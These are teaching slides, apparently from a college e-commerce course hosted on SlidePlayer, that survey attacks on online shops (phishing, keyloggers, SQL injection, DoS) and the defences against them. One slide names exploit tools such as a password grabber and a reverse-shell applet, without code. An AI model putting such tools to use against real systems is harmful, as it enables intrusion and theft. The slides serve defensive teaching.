Security Unit 1 Business skills for e-commerce

Slides:



Advertisements
Similar presentations
Security and Trust in E- Commerce. The E-commerce Security Environment: The Scope of the Problem  Overall size of cybercrime unclear; amount of losses.
Advertisements

Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.
Principles of Information Systems, Sixth Edition Electronic Commerce Chapter 8.
E-Commerce Security Issues. General E-Business Security Issues Any E-Business needs to be concerned about network security. The Internet is a “ public.
Online Banking Fraud Prevention Recommendations and Best Practices This document provides you with fraud prevention best practices that every employee.
Phishing (pronounced “fishing”) is the process of sending messages to lure Internet users into revealing personal information such as credit card.
Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
Software Security Threats Threats have been an issue since computers began to be used widely by the general public.
Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 5 Network Security.
Cyber Security - Threats James Clement Network Specialist ETS: Communications & Network Services
Web server security Dr Jim Briggs WEBP security1.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Lecture 11 Electronic Business (MGT-485). Recap – Lecture 10 Transaction costs Network Externalities Switching costs Critical mass of customers Pricing.
Internet Safety CSA September 21, Internet Threats Malware (viruses) Spyware Spam Hackers Cyber-criminals.
CS426Fall 2010/Lecture 361 Computer Security CS 426 Lecture 36 Perimeter Defense and Firewalls.
Security. Introduction to Security Why do we need security? What happens if data is lost? –Wrong business decisions through lack of information –Long-term.
Securing Information Systems
Kittiphan Techakittiroj (04/09/58 19:56 น. 04/09/58 19:56 น. 04/09/58 19:56 น.) Network Security (the Internet Security) Kittiphan Techakittiroj
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
Defining Security Issues
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
Internet Security for Small & Medium Business Week 6
1.Too many users 2.Technical factors 3.Organizational factors 4.Environmental factors 5.Poor management decisions Which of the following is not a source.
This courseware is copyrighted © 2015 gtslearning. No part of this courseware or any training material supplied by gtslearning International Limited to.
Software Security Testing Vinay Srinivasan cell:
1 Chpt. 12: INFORMATION SYSTEM QUALITY, SECURITY, AND CONTROL.
1 Class 15 System Security. Outline Security Threats (External: malware, spoofing/phishing, sniffing, & data theft: Internal: unauthorized data access,
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
McLean HIGHER COMPUTER NETWORKING Lesson 8 E-Commerce Explanation of ISP Description of E-commerce Description of E-sales.
Secure Wired Local Area Network( LAN ) By Sentuya Francis Derrick ID Module code:CT3P50N BSc Computer Networking London Metropolitan University.
Lesson 19-E-Commerce Security Needs. Overview Understand e-commerce services. Understand the importance of availability. Implement client-side security.
Microsoft ISA Server 2000 Presented by Ricardo Diaz Ryan Fansa.
Security Risks Viruses, worms, Trojans Hacking Spyware, phishing Keylogging Online fraud Identity theft DOS (Denial of Service attacks.
Security Discussion IST Retreat June IT Security Statement definition In the context of computer science, security is the prevention of, or protection.
Introduction to Computers Lesson 8B. home Ways to Connect to the Internet Direct connection Remote terminal connection Gateway connection LAN Modem High-speed.
E-commerce Security By John Doran. What is e-commerce?  the buying and selling of products or services over the internet [3].  Most e-commerce transactions.
ESTABLISHING AND MANAGING IT SECURITY Prepared by : Siti Mahani Mahmud Yong Azua Mat Zaliza Azan.
The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle branded credit.
Chapter 13 Network Security Auditing Antivirus Firewalls Authentication Authorization Encryption.
Security Risks Todays Lesson Security Risks Security Precautions
Chapter 40 Internet Security.
Objectives Unit 1 Business skills for e-commerce
Network security Vlasov Illia
Securing Information Systems
Objectives Unit 1 Business skills for e-commerce
Chapter 5 Electronic Commerce | Security Threats - Solution
Key processes Unit 1 Business skills for e-commerce
Network Security (the Internet Security)
Chapter 7: Identifying Advanced Attacks
E-commerce business. technology. society. Kenneth C. Laudon
TECHNOLOGY GUIDE THREE
ISYM 540 Current Topics in Information System Management
Target markets Unit 1 Business skills for e-commerce
Chapter 5 Electronic Commerce | Security Threats - Solution
Introduction to Computers
INFORMATION SECURITY The protection of information from accidental or intentional misuse of a persons inside or outside an organization Comp 212 – Computer.
Business Risks of Insecure Networks
Securing Information Systems
Teaching Computing to GCSE
Information Security Session October 24, 2005
Chapter 9 E-Commerce Security and Fraud Protection
HOW DO I KEEP MY COMPUTER SAFE?
Implementing Client Security on Windows 2000 and Windows XP Level 150
Firewalls Chapter 8.
WJEC GCSE Computer Science
Test 3 review FTP & Cybersecurity
Wireless Spoofing Attacks on Mobile Devices
6. Application Software Security
INTERNET SECURITY.
Unit 6.10 – L3 Internet Security
Presentation transcript:

Security Unit 1 Business skills for e-commerce HND in Computing and Systems Development

Timeline Week Activity 1 Introduction & Businesses 10 Assignment 2 LO2 LO1 Stakeholders 11 LO3 Key processes 3 LO1 Functions 12 LO3 e-commerce 4 13 LO3 Security - 1 5 LO2 Impacts 14 LO3 Security - 2 6 Assignment 1 LO1 15 LO3 Legislation 7 LO3Target markets 16 Assignment 3 LO3 issued 8 LO3 Objectives 17 Assignment work 9 LO3 Market research 18

LO3: Be able to design e-Commerce solutions Objectives: business idea eg unique selling proposition, business-to-business opportunities, business to consumer markets; domain name Market research: purpose of research eg identifying information sources, online and offline competition; types of research eg primary, secondary Target markets: market analysis eg size, characteristics, dynamics, competitors, historical background, emerging trends, market share, market segmentation Key processes: technology requirements eg hardware, software, security, maintenance, back end systems; supply sources; distribution channels e-Commerce: payment systems eg electronic cheque, PayPal, NoChex, credit or debit cards; start-up capital; working capital; funding sources Security: key areas eg prevention of hacking, viruses, identity theft, firewall, impact on site performance, Secure Sockets Layer (SSL), Secure HTTP (HTTPS), digital certificates, strong passwords, alternative authentication methods Legislation: relevant legislation eg Data Protection Act 1998, Computer Misuse Act 1990, Consumer Credit Act 1974, Trading Standards, Freedom of Information Act 2000, copyright legislation

LO3 Criteria 3.1 investigate market potential for an e-Commerce opportunity 3.2 evaluate current e-Commerce systems in use by organisations 3.3 discuss the financial implications of an e-Commerce solution 3.4 design an e-Commerce solution 3.5 evaluate the suitability of an e-Commerce solution.

Participants Customer Merchant Software vendor Attacker Purchases the products or services Merchant Owns or leases the ecommerce systems Software vendor Supplies the software to run the systems Attacker Exploits the other three for illegitimate gains

Points of attack The customer The customer’s computer Network connection between the customer’s computer and the merchant’s server The merchant The web site’s server The software vendor

Attacks Tricking the customer Calling and extracting information, then using it to con the merchant Phishing False web sites linked from emails or registered URL typos eg applr.com

Customers computers Port scanning Keystroke loggers nmap – a security scanner used to discover hosts and services on a computer network Keystroke loggers Distributed by virus, worm or Trojan

Network attacks IP address spoofing Packet sniffing Pretending to be a legitimate PC on a LAN or WAN Packet sniffing Detecting unencrypted or poorly protected wireless traffic False wi-fi hotspots

Fraud Chargeback fraud Stolen cards Identity theft Claiming delivered goods were never received Stolen cards Identity theft Falsely authenticating with stolen or faked documents to create accounts

Web server attacks Password guessing Denial of service (DOS) Manual or automated using common passwords or rainbow tables (reverse encrypted lookups) Denial of service (DOS) Pings of death, ping flood, botnets

Software vulnerabilities Buffer overflow attacks Poor code opens a vulnerability with root access SQL injection Malicious SQL statements inserted Cross site scripting Malicious scripts inserted in legitimate web sites

Exploit tools SAINT exploit tools penetration test servers (but do not exploit them) Examples are Chrome password grabber OSX 10.7 User name and hash grabber Reverse shell applet – delivers a signed Java applet ARP spoof tool for man in the middle attacks Automatic drive by download Flash drive trojan that opens connections when run by Autoplay or Open Folder

Defences Choose a secure ecommerce platform Use SSL security PCI (Payment Card Industry) compliant Run regular PCI audit scans Use SSL security Trusted certificates Encrypted connections Even better, use EVSSL More extensive vetting before issuing certificates Green in URL address bar in browser

Defences Firewalls Inspect incoming and outgoing packets to make sure the source or destination addresses are legitimate – packet filtering Statefull – is a packet part of a legitimate connection? Application layer – detects illegitimate protocol or port usage

UTM (unified threat management network firewalling network intrusion prevention gateway antivirus (AV) gateway anti-spam VPN content filtering load balancing data leak prevention on-appliance reporting

Sensible precautions Don’t store credit card details Use an address verification and card verification service Enforce strong passwords Detect suspicious activity Software available Use tracking for delivery of all orders Apply all patches and updates Have a sound backup

Activity Match the threats to the defences Determine what the correct defence is for each threat Determine what security measures are appropriate for an SME ecommerce business Local defences Hosted defences Services that can be used

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.